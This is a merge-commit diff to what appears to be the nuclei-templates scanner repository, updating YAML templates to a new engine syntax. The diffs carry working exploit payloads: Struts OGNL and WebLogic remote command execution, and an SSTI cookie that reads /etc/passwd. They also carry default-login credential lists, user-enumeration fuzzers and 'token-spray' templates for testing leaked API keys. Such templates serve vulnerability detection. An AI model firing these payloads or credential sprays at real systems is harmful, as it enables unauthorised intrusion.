Merge pull request #2844 from projectdiscovery/more-fixes

Changes to adopt v2.5.3 engine
2021-10-21 07:21:20 +05:30 · 2021-10-21 07:21:20 +05:30 · a21cec6362
parent df54ed28f7 1eaff3bfff
commit a21cec6362
85 changed files with 129 additions and 79 deletions
--- a/.nuclei-ignore
+++ b/.nuclei-ignore
@ -14,8 +14,3 @@ tags:
 # files is a list of files to ignore template execution
 # unless asked for by the user.
 files:
  - "token-spray/"
--- a/cves/2013/CVE-2013-2251.yaml
+++ b/cves/2013/CVE-2013-2251.yaml
@ -11,25 +11,19 @@ info:
 requests:
  - raw:
      - |
-        GET /index.action?§params§:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
+        GET /index.action?{{params}}:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
        Host: {{Hostname}}
        Connection: close
        Accept: */*
        Accept-Language: en
      - |
-        GET /login.action?§params§:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
+        GET /login.action?{{params}}:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
        Host: {{Hostname}}
        Connection: close
        Accept: */*
        Accept-Language: en
      - |
-        GET /index.action?§params§%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1
+        GET /index.action?{{params}}%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1
        Host: {{Hostname}}
        Connection: close
        Accept: */*
        Accept-Language: en
    payloads:
      params:
@ -40,11 +34,12 @@ requests:
    matchers-condition: and
    matchers:
      - type: status
        condition: or
        status:
          - 200
          - 400
-        condition: or
+
      - type: regex
        part: body
        regex:
          - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"
        part: body
--- a/cves/2017/CVE-2017-17562.yaml
+++ b/cves/2017/CVE-2017-17562.yaml
@ -91,15 +91,16 @@ requests:
        - webviewer
        - welcome
    attack: sniper
    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        condition: and
        words:
          - "environment variable"
-          - "display library search paths"
+          - "display library search paths"
        condition: and
--- a/cves/2019/CVE-2019-17382.yaml
+++ b/cves/2019/CVE-2019-17382.yaml
@ -22,14 +22,16 @@ requests:
    payloads:
      ids: helpers/wordlists/numbers.txt
-    attack: sniper
+
    threads: 50
    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "<title>Dashboard</title>"
--- a/cves/2020/CVE-2020-14882.yaml
+++ b/cves/2020/CVE-2020-14882.yaml
@ -28,8 +28,7 @@ requests:
      - |
        POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1
        Host: {{Hostname}}
-        cmd: §exec§
+        cmd: {{exec}}
        Connection: close
        Content-Type: application/x-www-form-urlencoded; charset=utf-8
        _nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession%28%22var%20m%20%3D%20java.lang.Class.forName%28%22weblogic.work.ExecuteThread%22%29.getDeclaredMethod%28%22getCurrentWork%22%29%3B%20var%20currThread%20%3D%20java.lang.Thread.currentThread%28%29%3B%20var%20currWork%20%3D%20m.invoke%28currThread%29%3B%20var%20f2%20%3D%20currWork.getClass%28%29.getDeclaredField%28%22connectionHandler%22%29%3B%20f2.setAccessible%28true%29%3B%20var%20connectionHandler%20%3D%20f2.get%28currWork%29%3B%20var%20f3%20%3D%20connectionHandler.getClass%28%29.getDeclaredField%28%22request%22%29%3B%20f3.setAccessible%28true%29%3B%20var%20request%20%3D%20f3.get%28connectionHandler%29%3B%20var%20command%20%3D%20request.getHeader%28%22cmd%22%29%3B%20var%20response%20%3D%20request.getResponse%28%29%3B%20var%20isWin%20%3D%20java.lang.System.getProperty%28%22os.name%22%29.toLowerCase%28%29.contains%28%22win%22%29%3B%20var%20listCmd%20%3D%20new%20java.util.ArrayList%28%29%3B%20var%20p%20%3D%20new%20java.lang.ProcessBuilder%28%22%22%29%3B%20if%28isWin%29%7Bp.command%28%22cmd.exe%22%2C%20%22%2Fc%22%2C%20command%29%3B%20%7Delse%7Bp.command%28%22%2Fbin%2Fbash%22%2C%20%22-c%22%2C%20command%29%3B%20%7D%20p.redirectErrorStream%28true%29%3B%20var%20process%20%3D%20p.start%28%29%3B%20var%20output%20%3D%20process.getInputStream%28%29%3B%20var%20scanner%20%3D%20new%20java.util.Scanner%28output%29.useDelimiter%28%22%5C%5C%5C%5CA%22%29%3B%20var%20out%20%3D%20scanner.next%28%29%3B%20var%20outputStream%20%3D%20response.getServletOutputStream%28%29%3B%20outputStream.write%28out.getBytes%28%29%29%3B%20outputStream.flush%28%29%3B%20response.getWriter%28%29.write%28%22%22%29%3B%20currThread.interrupt%28%29%3B%22%29
@ -41,12 +40,12 @@ requests:
    matchers-condition: and
    matchers:
      - type: regex
        condition: or
        regex:
          - "root:.*:0:0:"
          - "\\[(font|extension|file)s\\]"
        condition: or
        part: body
      - type: status
        status:
--- a/cves/2020/CVE-2020-7961.yaml
+++ b/cves/2020/CVE-2020-7961.yaml
@ -31,11 +31,12 @@ requests:
      command:
        - "systeminfo"  # Windows
        - "lsb_release -a"  # Linux
    attack: sniper
    matchers-condition: and
    matchers:
      - type: regex
        condition: or
        regex:
          - "OS Name:.*Microsoft Windows"
          - "Distributor ID:"
--- a/cves/2020/CVE-2020-9757.yaml
+++ b/cves/2020/CVE-2020-9757.yaml
@ -22,6 +22,8 @@ requests:
    path:
      - "{{BaseURL}}/actions/seomatic/meta-container/meta-link-container/?uri={{228*'98'}}"
      - "{{BaseURL}}/actions/seomatic/meta-container/all-meta-containers?uri={{228*'98'}}"
    skip-variables-check: true
    matchers-condition: and
    matchers:
      - type: status
--- a/default-logins/grafana/grafana-default-login.yaml
+++ b/default-logins/grafana/grafana-default-login.yaml
@ -1,4 +1,5 @@
 id: grafana-default-login
 info:
  name: Grafana Default Login
  author: pdteam
@ -26,7 +27,6 @@ requests:
      username:
        - admin
        - admin
      password:
        - prom-operator
        - admin
@ -35,16 +35,14 @@ requests:
    matchers:
      - type: word
        words:
-          - grafana_session
+          - "grafana_session" # Login cookie
        part: header
        # Check for 'grafana_session' cookie on valid login in the response header.
      - type: word
        words:
          - Logged in
        part: body
-        # Check for valid string on valid login.
+        words:
          - "Logged in" # Logged in keyword
      - type: status
        status:
-          - 200
+          - 200
--- a/default-logins/hp/hp-switch-default-login.yaml
+++ b/default-logins/hp/hp-switch-default-login.yaml
@ -20,15 +20,13 @@ requests:
      username:
        - admin
    attack: sniper
    matchers-condition: and
    matchers:
      - type: word
        condition: and
        words:
          - '"redirect": "/htdocs/pages/main/main.lsp"'
          - '"error": ""'
        condition: and
      - type: status
        status:
--- a/default-logins/idemia/idemia-biometrics-default-login.yaml
+++ b/default-logins/idemia/idemia-biometrics-default-login.yaml
@ -18,22 +18,21 @@ requests:
    payloads:
      password:
-        - 12345
+        - "12345"
    attack: sniper
    matchers-condition: and
    matchers:
      - type: word
        condition: and
        words:
          - "session_id="
          - "resource"
        condition: and
      - type: word
        words:
          - "Invalid Password"
        part: body
        negative: true
        words:
          - "Invalid Password"
      - type: status
        status:
--- a/fuzzing/adminer-panel-fuzz.yaml
+++ b/fuzzing/adminer-panel-fuzz.yaml
@ -23,17 +23,17 @@ requests:
    payloads:
      path: helpers/wordlists/adminer-paths.txt
    attack: sniper
    threads: 50
    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        condition: and
        words:
          - "- Adminer</title>"
-          - "partial(verifyVersion, "
+          - "partial(verifyVersion"
-        condition: and
+
      - type: status
        status:
          - 200
--- a/fuzzing/mdb-database-file.yaml
+++ b/fuzzing/mdb-database-file.yaml
@ -14,12 +14,10 @@ requests:
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Accept-Language: en-US,en;q=0.9
        Connection: close
    payloads:
      mdbPaths: helpers/wordlists/mdb-paths.txt
    attack: sniper
    threads: 50
    max-size: 500 # Size in bytes - Max Size to read from server response
    stop-at-first-match: true
--- a/fuzzing/prestashop-module-fuzz.yaml
+++ b/fuzzing/prestashop-module-fuzz.yaml
@ -1,4 +1,5 @@
 id: prestashop-module-fuzz
 info:
  name: Prestashop Modules Enumeration
  author: meme-lord
@ -16,19 +17,18 @@ requests:
    payloads:
      path: helpers/wordlists/prestashop-modules.txt
    attack: sniper
    threads: 50
    threads: 50
    matchers-condition: and
    matchers:
      - type: word
        condition: and
        words:
          - "<module>"
          - "<name>"
          - "<displayName>"
          - "<is_configurable>"
          - "</module>"
        condition: and
      - type: status
        status:
--- a/fuzzing/wordpress-plugins-detect.yaml
+++ b/fuzzing/wordpress-plugins-detect.yaml
@ -1,4 +1,5 @@
 id: wordpress-plugins-detect
 info:
  name: WordPress Plugins Detection
  author: 0xcrypto
@ -13,11 +14,8 @@ requests:
    payloads:
      pluginSlug: helpers/wordlists/wordpress-plugins.txt
    attack: sniper
    threads: 50
    redirects: true
    max-redirects: 1
    threads: 50
    matchers-condition: and
    matchers:
      - type: status
--- a/fuzzing/wordpress-themes-detect.yaml
+++ b/fuzzing/wordpress-themes-detect.yaml
@ -1,4 +1,5 @@
 id: wordpress-themes-detect
 info:
  name: WordPress Theme Detection
  author: 0xcrypto
@ -13,11 +14,8 @@ requests:
    payloads:
      themeSlug: helpers/wordlists/wordpress-themes.txt
    attack: sniper
    threads: 50
    redirects: true
    max-redirects: 1
    threads: 50
    matchers-condition: and
    matchers:
      - type: status
--- a/miscellaneous/ntlm-directories.yaml
+++ b/miscellaneous/ntlm-directories.yaml
@ -14,6 +14,7 @@ requests:
        Host: {{Hostname}}
        Authorization: NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=
    threads: 50
    payloads:
      path:
        - /
@ -63,9 +64,6 @@ requests:
        - /webticket/webticketservice.svcabs/
        - /adfs/services/trust/2005/windowstransport
    attack: sniper
    threads: 50
    matchers-condition: and
    matchers:
      - type: dsl
--- a/token-spray/README.md
+++ b/token-spray/README.md
@ -1,15 +1,19 @@
 ## About
 This directory holds templates that have static API URL endpoints. Use these to test an API token against many API service endpoints. By providing token input using flag, Nuclei will test the token against all known API endpoints within the API templates, and return any successful results. By incorporating API checks as Nuclei Templates, users can test API keys that have no context (i.e., API keys that do not indicate for which API endpoint they are meant).
 ## Usage
 You do not need to specify an input URL to test a token against these API endpoints, as the API endpoints have static URLs. However, Nuclei requires an input (specified via `-u` for individual URLs or `-l` for a file containing URLs). Because of this requirement, we simply pass in `-u "null"`. Each template in the `token-spray` directory assumes the input API token will be provided using CLI `var` flag.
-```bash
+token-spray are **self-contained** template and does not requires URLs as input as the API endpoints have static URLs predefined in the template. Each template in the `token-spray` directory assumes the input API token/s will be provided using CLI `var` flag.
 # Run Nuclei specifying all the api templates:
-nuclei -u null -t token-spray/ -var token=thisIsMySecretTokenThatIWantToTest
+```console
 # Running token-spray templates against a single token to test
 nuclei -t token-spray/ -var token=random-token-to-test
 # Running token-spray templates against a file containing multiple new line delimited tokens
 nuclei -t token-spray/ -var token=file_with_tokens.txt
 ```
 ## Credits
 These API testing templates were inspired by the [streaak/keyhacks](https://github.com/streaak/keyhacks) repository. The Bishop Fox [Continuous Attack Surface Testing (CAST)](https://www.bishopfox.com/continuous-attack-surface-testing/how-cast-works/) team created additional API templates for testing API keys uncovered during investigations. You are welcome to add new templates based on the existing format to cover more APIs.
 These API testing templates were inspired by the [streaak/keyhacks](https://github.com/streaak/keyhacks) repository. The Bishop Fox [Continuous Attack Surface Testing (CAST)](https://www.bishopfox.com/continuous-attack-surface-testing/how-cast-works/) team created additional API templates for testing API keys uncovered during investigations. You are welcome to add new templates based on the existing format to cover more APIs.
--- a/token-spray/asana.yaml
+++ b/token-spray/asana.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,asana
 self-contained: true
 requests:
  - method: GET
    path:
@ -16,6 +17,6 @@ requests:
    matchers:
      - type: status
        negative: true
        status:
          - 401
        negative: true
--- a/token-spray/bingmaps.yaml
+++ b/token-spray/bingmaps.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,bing,maps,bingmaps
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/bitly.yaml
+++ b/token-spray/bitly.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,bitly
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/buildkite.yaml
+++ b/token-spray/buildkite.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,buildkite
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/buttercms.yaml
+++ b/token-spray/buttercms.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,buttercms
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/calendly.yaml
+++ b/token-spray/calendly.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,calendly
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/circleci.yaml
+++ b/token-spray/circleci.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,circle,circleci
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/deviantart.yaml
+++ b/token-spray/deviantart.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,deviantart
 self-contained: true
 requests:
  - method: POST
    path:
--- a/token-spray/dropbox.yaml
+++ b/token-spray/dropbox.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,dropbox
 self-contained: true
 requests:
  - method: POST
    path:
--- a/token-spray/github.yaml
+++ b/token-spray/github.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,github
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/google-autocomplete.yaml
+++ b/token-spray/google-autocomplete.yaml
@ -6,6 +6,7 @@ info:
  severity: info
  tags: token-spray,google,autocomplete
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/google-customsearch.yaml
+++ b/token-spray/google-customsearch.yaml
@ -6,6 +6,7 @@ info:
  severity: info
  tags: token-spray,google,search
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/google-directions.yaml
+++ b/token-spray/google-directions.yaml
@ -6,6 +6,7 @@ info:
  severity: info
  tags: token-spray,google,directions
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/google-elevation.yaml
+++ b/token-spray/google-elevation.yaml
@ -6,6 +6,7 @@ info:
  severity: info
  tags: token-spray,google,elevation
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/google-fcm.yaml
+++ b/token-spray/google-fcm.yaml
@ -6,6 +6,7 @@ info:
  severity: info
  tags: token-spray,google,fcm,firebase,cloud,messaging
 self-contained: true
 requests:
  - method: POST
    path:
--- a/token-spray/google-findplacefromtext.yaml
+++ b/token-spray/google-findplacefromtext.yaml
@ -6,6 +6,7 @@ info:
  severity: info
  tags: token-spray,google,find,text
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/google-gedistancematrix.yaml
+++ b/token-spray/google-gedistancematrix.yaml
@ -6,6 +6,7 @@ info:
  severity: info
  tags: token-spray,google,distance,matrix
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/google-geocode.yaml
+++ b/token-spray/google-geocode.yaml
@ -6,6 +6,7 @@ info:
  severity: info
  tags: token-spray,google,geocode
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/google-geolocation.yaml
+++ b/token-spray/google-geolocation.yaml
@ -6,19 +6,21 @@ info:
  severity: info
  tags: token-spray,google,geolocation
 self-contained: true
 requests:
  - method: GET
    path:
      - "https://www.googleapis.com/geolocation/v1/geolocate?key={{token}}"
    matchers-condition: and
    matchers-condition: and
    matchers:
      - type: word
        part: body
        negative: true
        words:
          - 'error'
-        negative: true
+
      - type: status
        negative: true
        status:
          - 404
        negative: true
--- a/token-spray/google-mapsembed.yaml
+++ b/token-spray/google-mapsembed.yaml
@ -6,6 +6,7 @@ info:
  severity: info
  tags: token-spray,google,maps,embed
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/google-mapsembedadvanced.yaml
+++ b/token-spray/google-mapsembedadvanced.yaml
@ -6,6 +6,7 @@ info:
  severity: info
  tags: token-spray,google,maps,embed
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/google-nearbysearch.yaml
+++ b/token-spray/google-nearbysearch.yaml
@ -6,6 +6,7 @@ info:
  severity: info
  tags: token-spray,google,search,nearby
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/google-nearestroads.yaml
+++ b/token-spray/google-nearestroads.yaml
@ -6,6 +6,7 @@ info:
  severity: info
  tags: token-spray,google,roads
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/google-placedetails.yaml
+++ b/token-spray/google-placedetails.yaml
@ -6,6 +6,7 @@ info:
  severity: info
  tags: token-spray,google,place,details
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/google-placesphoto.yaml
+++ b/token-spray/google-placesphoto.yaml
@ -6,6 +6,7 @@ info:
  severity: info
  tags: token-spray,google,places,photo
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/google-playablelocations.yaml
+++ b/token-spray/google-playablelocations.yaml
@ -6,6 +6,7 @@ info:
  severity: info
  tags: token-spray,google,playable,locations
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/google-routetotraveled.yaml
+++ b/token-spray/google-routetotraveled.yaml
@ -6,6 +6,7 @@ info:
  severity: info
  tags: token-spray,google,route
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/google-speedlimit.yaml
+++ b/token-spray/google-speedlimit.yaml
@ -6,6 +6,7 @@ info:
  severity: info
  tags: token-spray,google,speed,limit
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/google-staticmaps.yaml
+++ b/token-spray/google-staticmaps.yaml
@ -6,6 +6,7 @@ info:
  severity: info
  tags: token-spray,google,maps
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/google-streetview.yaml
+++ b/token-spray/google-streetview.yaml
@ -6,6 +6,7 @@ info:
  severity: info
  tags: token-spray,google,streetview
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/google-timezone.yaml
+++ b/token-spray/google-timezone.yaml
@ -6,6 +6,7 @@ info:
  severity: info
  tags: token-spray,google,timezone
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/googlet-extsearchplaces.yaml
+++ b/token-spray/googlet-extsearchplaces.yaml
@ -6,6 +6,7 @@ info:
  severity: info
  tags: token-spray,google,search,places,text
 self-contained: true
 requests:
  - method: GET
    path:
@ -14,6 +15,6 @@ requests:
    matchers:
      - type: word
        part: body
        negative: true
        words:
          - 'error_message'
        negative: true
--- a/token-spray/heroku.yaml
+++ b/token-spray/heroku.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,heroku
 self-contained: true
 requests:
  - method: POST
    path:
@ -17,9 +18,9 @@ requests:
    matchers:
      - type: status
        condition: or
        status:
          - 200
          - 201
          - 202
          - 206
        condition: or
--- a/token-spray/hubspot.yaml
+++ b/token-spray/hubspot.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,hubspot
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/instagram.yaml
+++ b/token-spray/instagram.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,instagram,graph
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/ipstack.yaml
+++ b/token-spray/ipstack.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,ipstack
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/iterable.yaml
+++ b/token-spray/iterable.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,iterable
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/jumpcloud.yaml
+++ b/token-spray/jumpcloud.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,jumpcloud
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/lokalise.yaml
+++ b/token-spray/lokalise.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,lokalise
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/loqate.yaml
+++ b/token-spray/loqate.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,loqate
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/mailchimp.yaml
+++ b/token-spray/mailchimp.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,mailchimp
 self-contained: true
 network:
  - inputs:
      - data: "AUTH PLAIN {{base64(hex_decode('00')+'apikey'+hex_decode('00')+token)}}\r\n"
--- a/token-spray/mailgun.yaml
+++ b/token-spray/mailgun.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,mailgun
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/mapbox.yaml
+++ b/token-spray/mapbox.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,mapbox
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/nerdgraph.yaml
+++ b/token-spray/nerdgraph.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,newrelic,nerdgraph
 self-contained: true
 requests:
  - method: POST
    path:
--- a/token-spray/npm.yaml
+++ b/token-spray/npm.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,node,npm,package,manager
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/openweather.yaml
+++ b/token-spray/openweather.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,weather,openweather
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/pagerduty.yaml
+++ b/token-spray/pagerduty.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,pagerduty
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/pendo.yaml
+++ b/token-spray/pendo.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,pendo
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/pivotaltracker.yaml
+++ b/token-spray/pivotaltracker.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,pivotaltracker
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/postmark.yaml
+++ b/token-spray/postmark.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,postmark
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/sendgrid.yaml
+++ b/token-spray/sendgrid.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,sendgrid
 self-contained: true
 network:
  - inputs:
      - data: "ehlo\r\n"
--- a/token-spray/slack.yaml
+++ b/token-spray/slack.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,slack
 self-contained: true
 requests:
  - method: POST
    path:
--- a/token-spray/sonarcloud.yaml
+++ b/token-spray/sonarcloud.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,sonarcloud
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/spotify.yaml
+++ b/token-spray/spotify.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,spotify
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/square.yaml
+++ b/token-spray/square.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,square
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/stripe.yaml
+++ b/token-spray/stripe.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,stripe
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/tinypng.yaml
+++ b/token-spray/tinypng.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,tinypng
 self-contained: true
 requests:
  - method: POST
    path:
--- a/token-spray/travisci.yaml
+++ b/token-spray/travisci.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,travis
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/twitter.yaml
+++ b/token-spray/twitter.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,twitter
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/visualstudio.yaml
+++ b/token-spray/visualstudio.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,visualstudio,microsoft
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/wakatime.yaml
+++ b/token-spray/wakatime.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,wakatime
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/weglot.yaml
+++ b/token-spray/weglot.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,weglot
 self-contained: true
 requests:
  - method: POST
    path:
--- a/token-spray/youtube.yaml
+++ b/token-spray/youtube.yaml
@ -7,17 +7,19 @@ info:
  severity: info
  tags: token-spray,youtube
 self-contained: true
 requests:
  - method: GET
    path:
      - "https://www.googleapis.com/youtube/v3/activities?part=contentDetails&maxResults=25&channelId=UC-lHJZR3Gqxm24_Vd_AJ5Yw&key={{token}}"
    matchers-condition: or
    matchers-condition: or
    matchers:
      - type: word
        part: body
        words:
          - 'quotaExceeded'
      - type: status
        status:
          - 200
--- a/vulnerabilities/gitlab/gitlab-user-enumeration.yaml
+++ b/vulnerabilities/gitlab/gitlab-user-enumeration.yaml
@ -16,10 +16,9 @@ requests:
        Accept: application/json, text/plain, */*
        Referer: {{BaseURL}}
    threads: 50
    payloads:
      user: helpers/wordlists/user-list.txt
    attack: sniper
    threads: 50
    matchers-condition: and
    matchers:
--- a/vulnerabilities/gitlab/gitlab-user-open-api.yaml
+++ b/vulnerabilities/gitlab/gitlab-user-open-api.yaml
@ -15,10 +15,9 @@ requests:
        Accept: application/json, text/plain, */*
        Referer: {{BaseURL}}
    threads: 50
    payloads:
      uid: helpers/wordlists/numbers.txt
    attack: sniper
    threads: 50
    matchers-condition: and
    matchers:
--- a/vulnerabilities/other/pdf-signer-ssti-to-rce.yaml
+++ b/vulnerabilities/other/pdf-signer-ssti-to-rce.yaml
@ -12,6 +12,8 @@ requests:
      - "{{BaseURL}}"
    headers:
      Cookie: "CSRF-TOKEN=rnqvt{{shell_exec('cat /etc/passwd')}}to5gw; simcify=uv82sg0jj2oqa0kkr2virls4dl"
    skip-variables-check: true
    matchers-condition: and
    matchers:
      - type: status
--- a/vulnerabilities/other/rconfig-rce.yaml
+++ b/vulnerabilities/other/rconfig-rce.yaml
@ -33,7 +33,7 @@ requests:
        --01b28e152ee044338224bf647275f8eb
        Content-Disposition: form-data; name="email"
